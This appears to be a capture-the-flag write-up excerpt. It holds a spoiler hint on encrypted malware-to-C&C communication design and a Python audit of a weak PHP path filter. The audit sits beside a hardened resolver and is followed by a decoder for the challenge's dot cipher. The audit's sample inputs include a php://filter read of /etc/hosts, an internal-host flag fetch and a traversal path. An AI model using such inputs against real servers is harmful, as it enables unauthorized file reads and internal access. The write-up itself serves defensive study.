:::spoiler Hint3
Malware Design Principle
Communication
- Make sure that everything is encrypted.
- Use static key or do key exchange in the beginning.
- Socket is suck, C&C should know what and how you send in advance.

There are several files sent together in each conversation. As a malware developer, how would you design the communication between malware and C&C ?
:::

---
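
Added example for the 🦈Shark section above (not code from the challenge or its author): a Python model of the `preg_match('/^(\.|\/)/', $path)` check in `index.php`, run over the `?path=` values shown in that section, next to a stricter resolver that refuses scheme prefixes, confines the path to a base directory and serves only allowlisted files. `BASE_DIR`, `ALLOWED_FILES` and the function names are assumptions made for the illustration, and `docs/../../etc/hosts` is a constructed test input.

```python
import re
from pathlib import Path
from typing import Optional

# Same pattern as index.php: only a leading "." or "/" is refused.
ORIGINAL_BLOCK = re.compile(r"^(\.|/)")
# A URL or PHP stream-wrapper prefix such as "php://" or "http://".
SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")

# Assumed deployment values, not taken from the challenge.
BASE_DIR = Path("/var/www/html")
ALLOWED_FILES = frozenset({"hint.txt"})

# Values of ?path= that appear in the write-up, plus one constructed case.
SAMPLE_PATHS = [
    "hint.txt",
    "index.php",
    "/etc/hosts",
    "php://filter/convert.base64-encode/resource=/etc/hosts",
    "http://172.22.0.2/flag",
    "docs/../../etc/hosts",  # constructed
]


def original_allows(path: str) -> bool:
    """True when index.php would pass the value on to file_get_contents()."""
    return bool(path) and ORIGINAL_BLOCK.match(path) is None


def hardened_resolve(path: str) -> Optional[Path]:
    """Return the file to serve, or None when the request must be refused."""
    if not path or "\x00" in path or SCHEME.match(path):
        return None                      # no stream wrappers, no remote URLs
    base = BASE_DIR.resolve()
    candidate = (base / path).resolve()  # collapses "..", follows symlinks
    try:
        relative = candidate.relative_to(base)
    except ValueError:
        return None                      # resolved outside the base directory
    if relative.as_posix() not in ALLOWED_FILES:
        return None                      # not a file that is meant to be readable
    return candidate


def audit(paths):
    """Return (path, original_allows, hardened_allows) for each input."""
    return [(p, original_allows(p), hardened_resolve(p) is not None) for p in paths]


if __name__ == "__main__":
    for path, old, new in audit(SAMPLE_PATHS):
        print(f"{'allow' if old else 'deny':5} -> {'allow' if new else 'deny':5}  {path}")
```
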
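
Added example for the 🍍TsaiBro section above (not the author's script): a Python decoder for the table-matching approach, using the cipher table from that section with code 61 mapped to `e`, which the `h4ve` in the flag requires. The rule that each `發財` is followed by a run of dots whose length is one digit of a two-digit table code is inferred from the table, ciphertext and flag on this page; `SAMPLE` is the first 18 groups of the ciphertext, and the function names are chosen for the illustration.

```python
import re

# Cipher table from the write-up, one printed row per line, as "<code> <char>" pairs.
TABLE_TEXT = """
11 5 21 W 31 a 41 S 51 K 61 e 71 i 81 C
12 6 22 X 32 b 42 T 52 L 62 f 72 j 82 D
13 7 23 Y 33 c 43 U 53 M 63 g 73 k 83 E
14 8 24 0 34 d 44 V 54 N 64 h 74 l 84 F
15 9 25 y 35 m 45 G 55 u 65 q 75 O 85 1
16 { 26 z 36 n 46 H 56 v 66 r 76 P 86 2
17 } 27 A 37 o 47 I 57 w 67 s 77 Q 87 3
18 _ 28 B 38 p 48 J 58 x 68 t 78 R 88 4
"""

# One "發財" followed by a run of dots; the run length is one digit.
GROUP = re.compile(r"發財(\.+)")


def load_table(text):
    """Parse code/char pairs and refuse a table that is not one-to-one."""
    tokens = text.split()
    if len(tokens) % 2:
        raise ValueError("table must consist of code/char pairs")
    table = dict(zip(tokens[0::2], tokens[1::2]))
    if len(set(table.values())) != len(table):
        raise ValueError("two codes map to the same character")
    return table


TABLE = load_table(TABLE_TEXT)


def decode(ciphertext):
    """Turn pairs of dot-run lengths into table codes and look them up."""
    digits = [len(run) for run in GROUP.findall(ciphertext)]
    if len(digits) % 2:
        raise ValueError("odd number of 發財 groups")
    out = []
    for high, low in zip(digits[0::2], digits[1::2]):
        code = f"{high}{low}"
        if code not in TABLE:
            raise ValueError(f"code {code} is not in the table")
        out.append(TABLE[code])
    return "".join(out)


def encode(plaintext):
    """Inverse of decode(), used to check the table round-trips."""
    reverse = {char: code for code, char in TABLE.items()}
    return "".join("發財" + "." * int(d) for char in plaintext for d in reverse[char])


# First 18 groups of the ciphertext in the write-up, one character per line.
SAMPLE = (
    "發財..發財......."        # 27
    "發財....發財......."      # 47
    "發財....發財."            # 41
    "發財........發財......."  # 87
    "發財.發財......"          # 16
    "發財..發財....."          # 25
    "發財........發財......."  # 87
    "發財......發財......."    # 67
    "發財.發財........"        # 18
)

if __name__ == "__main__":
    print(decode(SAMPLE))
```
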